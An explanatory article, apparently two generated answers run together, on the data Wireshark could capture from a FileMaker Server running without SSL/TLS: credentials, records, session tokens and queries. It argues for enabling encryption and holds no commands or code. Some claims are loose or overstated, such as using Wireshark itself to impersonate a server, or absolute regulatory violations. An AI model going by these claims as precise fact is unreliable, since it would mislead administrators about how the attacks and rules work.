What You Could Capture Using Wireshark on an Unencrypted FileMaker Server Network

Without SSL/TLS encryption in place on a FileMaker Server, someone with Wireshark or another network packet analyzer installed on the local network could potentially capture and view unencrypted traffic, including sensitive data. Here’s a detailed explanation of what you, or anyone with the right access, could observe and why this is a significant security risk:

What You Could Capture Using Wireshark on an Unencrypted FileMaker Server Network

1. Active Directory Credentials in Plain Text
   • Scenario: If the FileMaker Server is configured to use SSO with Active Directory but no SSL/TLS is in place, the Active Directory credentials (usernames and passwords) being used for authentication could be captured in plain text.
   • How: Wireshark would allow you to intercept LDAP or Kerberos authentication requests between the client (e.g., FileMaker Pro) and the Active Directory server. If these communications aren’t encrypted, you could capture packets that contain passwords, allowing you to compromise other accounts on the network.
   • Risk: With this information, an attacker could impersonate users, access AD resources, or gain elevated privileges, depending on the credentials captured.
2. FileMaker Database Traffic (Unencrypted Data)
   • Scenario: If users are accessing the FileMaker Server to read, edit, or create records, all that data is sent between the client (FileMaker Pro, Go, or WebDirect) and the server.
   • How: Wireshark would capture these packets, allowing you to view all the data in clear text. This includes record-level data, which could be personal information (PII), financial data, proprietary business information, or anything else stored in the FileMaker database.
   • Risk: This presents a significant privacy and confidentiality breach, especially if sensitive business or customer data is involved. Personal details, financial information, and intellectual property could all be exposed.
3. Login Information for FileMaker Accounts
   • Scenario: Even without SSO, if FileMaker native accounts (username and password) are being used to authenticate, Wireshark could capture login attempts from users.
   • How: If users are logging into FileMaker Server via HTTP or unencrypted WebDirect, their login credentials could be intercepted and read in plain text.
   • Risk: Once an attacker has the username and password, they could log into the FileMaker Server themselves, gaining access to all the databases and records available to that account.
4. Session Data and Tokens
   • Scenario: FileMaker WebDirect and other web-based tools will often use session tokens to maintain user authentication after a login has occurred.
   • How: Without SSL, these tokens can be captured via Wireshark. An attacker could hijack an active session by obtaining this session token and use it to impersonate the user in ongoing sessions.
   • Risk: The attacker could gain full access to the user’s account on the FileMaker Server without needing to know their credentials.
5. SQL Queries or Data Requests
   • Scenario: FileMaker Server can also expose data through ODBC/JDBC connections or even API requests.
   • How: If these requests are unencrypted, Wireshark would be able to capture the SQL queries or API requests made by the client. This could give an attacker insight into how the database is structured and what data is being queried.
   • Risk: An attacker could use this information to reconstruct database records or gain knowledge of how to craft their own malicious SQL queries or API calls.
6. FileMaker Scripts
   • Scenario: FileMaker scripts can be used to perform complex database actions such as record lookups, data exports, and even file system manipulations.
   • How: Without encryption, Wireshark could capture the traffic between FileMaker clients and the server, which may contain script instructions.
   • Risk: An attacker could learn about internal operations, processes, or workflows by analyzing the captured script instructions, potentially leading to further exploitation.

The Risks of No SSL/TLS Encryption

Here’s why the absence of SSL/TLS on your FileMaker Server opens your network up to significant risks:

1. Data Theft

• Anyone on the local network can easily capture sensitive data transmitted between clients and the FileMaker Server. This could include personal information, proprietary data, business records, and financial information.

2. Credential Theft and Privilege Escalation

• Active Directory or FileMaker native credentials could be stolen, allowing attackers to impersonate legitimate users. Depending on the permissions of the stolen credentials, the attacker could gain administrative privileges or access sensitive databases.

3. Man-in-the-Middle Attacks

• If someone captures unencrypted traffic, they can modify it or inject malicious data into the communication. This can result in users receiving altered or false information. Attackers could use this to corrupt databases, deliver harmful data, or cause operational disruption.

4. Session Hijacking

• Attackers can capture session tokens or cookies from WebDirect users and use them to hijack active sessions, gaining unauthorized access to the server as if they were the authenticated user.

5. Eavesdropping and Surveillance

• Even if credentials aren’t captured, an attacker could perform network surveillance, gaining insight into internal operations, data patterns, and business processes just by observing the unencrypted traffic.

6. Regulatory and Compliance Failures

• Many industries require that sensitive data be encrypted in transit to comply with regulations like GDPR, HIPAA, and PCI DSS. Running FileMaker Server without SSL violates these regulations and exposes the organization to legal and financial penalties.

What Happens When SSL is Enabled?

When SSL is properly configured on the FileMaker Server:

1. Data Encryption: All data between the client and server is encrypted using SSL/TLS. Even if someone captures the packets, they won’t be able to read the contents unless they break the encryption, which is computationally unfeasible with modern standards (e.g., AES-256).
2. Secure Authentication: Credentials and session tokens are transmitted over an encrypted channel, so even if Wireshark captures the traffic, the data will be encrypted and useless to an attacker.
3. Man-in-the-Middle Defense: SSL prevents man-in-the-middle attacks by ensuring that the client and server authenticate each other with certificates. This means that even if someone attempts to intercept and modify the communication, the client will detect the tampered data and break the connection.
4. Data Integrity: SSL also provides data integrity checks, ensuring that the data received is the same as the data sent. If an attacker tries to modify the traffic, SSL will detect it, preventing any alterations from going through.

In Summary

If a FileMaker Server is running without SSL/TLS encryption on the local network, and you have Wireshark installed, you would be able to:

• Capture credentials (AD or FileMaker native logins) and potentially access the system as a legitimate user.
• View and steal sensitive data being transmitted, including personal, financial, or proprietary information.
• Hijack sessions, especially if WebDirect is being used, by capturing and replaying session tokens.
• Intercept and manipulate requests made by users, including queries or script actions, posing significant security and integrity risks.

Enabling SSL/TLS encryption is essential to prevent this type of exposure and secure both the SSO process and ongoing data exchanges between FileMaker clients and FileMaker Server. Without SSL, the internal network traffic is vulnerable to anyone with access and basic network sniffing tools like Wireshark.

If you, equipped with Wireshark and access to a local network where a FileMaker Server is serving data without SSL encryption, the potential risks and issues would be significant. Here’s what could happen and why it’s crucial to have SSL enabled on the FileMaker Server, especially in a production environment.

What Could You Do with Wireshark on an Unencrypted FileMaker Network?

1. Capture and View Unencrypted Data

• Without SSL, all data transmitted between FileMaker clients (e.g., FileMaker Pro, FileMaker Go, WebDirect) and the FileMaker Server is sent in plain text over the network. This means that with Wireshark, you could easily capture and read the contents of the data being exchanged.
• What Could Be Captured?
  • Login credentials: If users log in without SSL, their usernames and passwords would be exposed in clear text.
  • Database queries and responses: Any records or data updates sent to or from the server would be visible, allowing you to view, intercept, and manipulate sensitive information such as personal details, financial data, proprietary information, or any data stored in the FileMaker databases.
• Example: If a user logs into a FileMaker database containing employee records, Wireshark could capture the credentials and all the employee details sent between the server and the client.

2. Active Directory Credentials Exposure (SSO)

• SSO with Active Directory typically passes authentication tokens or credentials between the FileMaker Server and the AD server. Without SSL, these tokens or Active Directory credentials can be intercepted.
• With Wireshark, you could capture the Kerberos tickets or LDAP traffic being transmitted in clear text during the SSO process. This could give you access to sensitive information, such as the username and potentially password hashes of users authenticating through AD.
• Risk: If Active Directory credentials are intercepted, you could potentially gain access to user accounts, especially if there are weaknesses in how credentials are handled.

3. Session Hijacking

• Without SSL, session cookies and tokens used for authenticating users within the FileMaker ecosystem can be captured. These tokens could then be used to hijack user sessions.
• Example: If a user authenticates using WebDirect, Wireshark could capture the session token, allowing you to impersonate that user and access their session without needing their credentials.

4. Man-in-the-Middle Attacks (MITM)

• Without SSL, there is no protection against a Man-in-the-Middle (MITM) attack. You could use Wireshark or other network tools to impersonate the FileMaker Server and intercept traffic between clients and the server.
• Attack Scenario: You could modify the data being transmitted between the client and server or inject malicious content into the communication. This could lead to unauthorized access, data corruption, or even complete takeover of a user’s session.

5. Modify or Inject Data

• Not only could you view the unencrypted data, but without SSL, there’s the potential to inject or alter data being transmitted across the network.
• Example: If a FileMaker client sends a data request or submits a record update, you could modify the packet mid-transmission, changing the content before it reaches the server. This could lead to unauthorized data changes, such as altering financial records or tampering with sensitive business information.

6. Sniff API Traffic (If Used)

• If the FileMaker Server is interacting with internal APIs (e.g., REST APIs) or other microservices without SSL, Wireshark could be used to sniff the API requests and responses.
• Example: If FileMaker is fetching sensitive data from an internal API, such as product pricing or inventory levels, this data could be captured in plain text. You could potentially extract sensitive information or even replay API requests to manipulate the system.

7. Sensitive Data Exposure

• Data-at-Rest Encryption (encryption within the database) might be in place, but data-in-transit (communication between clients and the server) would still be exposed. This means all sensitive information such as:
  • Customer records
  • Financial data
  • Personal identification information (PII)
  • Proprietary business information

Could all be captured in transit by Wireshark, leading to data breaches or compliance violations.

Real-World Example: Active Directory and FileMaker Without SSL

Let’s say an organization has a FileMaker Server setup using Single Sign-On (SSO) with Active Directory. Users authenticate via their Active Directory credentials, and the server communicates internally with the Active Directory server to verify credentials and assign access permissions. Without SSL:

1. Credential Interception:
   • With Wireshark, you could capture the network traffic during the authentication process.
   • The LDAP traffic (especially if it’s using LDAP instead of LDAPS) or the Kerberos ticket exchange would be visible, allowing you to extract usernames and password hashes.
2. Data in Transit:
   • Once the user is authenticated, their data requests (e.g., accessing databases, updating records, submitting forms) would all be transmitted in clear text, allowing you to see every interaction.
   • Sensitive business data like financial reports or customer data could easily be intercepted.
3. Session Hijacking:
   • After SSO authentication, the session token used by FileMaker clients to maintain an active session could be intercepted and reused by an attacker, granting them access to the user’s session without the need for credentials.

Why SSL is Essential for FileMaker in a Local Network

Even though the FileMaker Server is operating on a local network, the need for SSL is critical because:

1. Local Networks Aren’t Immune to Attacks:
   • Internal threats (e.g., disgruntled employees, unauthorized contractors, or even compromised devices) can exploit unencrypted data.
   • Wireshark is a powerful tool that, when used maliciously, can expose all the vulnerabilities present in unencrypted network traffic.
2. Active Directory Credentials Must Be Protected:
   • SSO with AD is convenient, but AD credentials are critical to the security of the entire domain. If compromised, an attacker can access multiple systems within the network.
3. Compliance Requirements:
   • Many organizations need to comply with data security regulations (GDPR, HIPAA, PCI DSS, etc.). Even internal communication needs to be encrypted to protect personally identifiable information (PII) or sensitive business data.
4. Mitigating MITM Attacks:
   • SSL/TLS prevents man-in-the-middle attacks, which can compromise both the authentication process and the data being exchanged.

Conclusion

If you have access to the local network where a FileMaker Server operates without SSL, Wireshark could give you complete visibility into the unencrypted traffic, exposing sensitive information such as:

• Login credentials (usernames, passwords, AD tokens)
• Database queries (personal data, financial records, proprietary information)
• Session tokens (allowing session hijacking)
• Internal API requests and responses

By encrypting traffic with SSL/TLS, FileMaker Server ensures that all communications are protected from interception, ensuring the security of Active Directory credentials, business data, and user sessions.

This is why SSL/TLS is critical for any production FileMaker Server, even if it only operates within a local network. Without it, sensitive data remains vulnerable to anyone with network access and a tool like Wireshark.